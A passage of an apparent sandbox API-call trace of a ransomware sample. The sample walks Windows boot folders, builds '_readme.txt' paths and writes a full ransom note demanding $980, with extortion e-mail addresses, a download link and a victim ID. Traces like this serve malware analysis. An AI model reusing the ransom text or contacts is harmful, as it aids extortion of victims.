PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.945] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.945] PathFindFileNameW (pszPath="") returned="" [0200.945] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.946] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.946] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.946] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.946] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0200.947] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0200.947] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.947] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.947] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.947] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.948] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.948] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.948] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.948] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.948] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 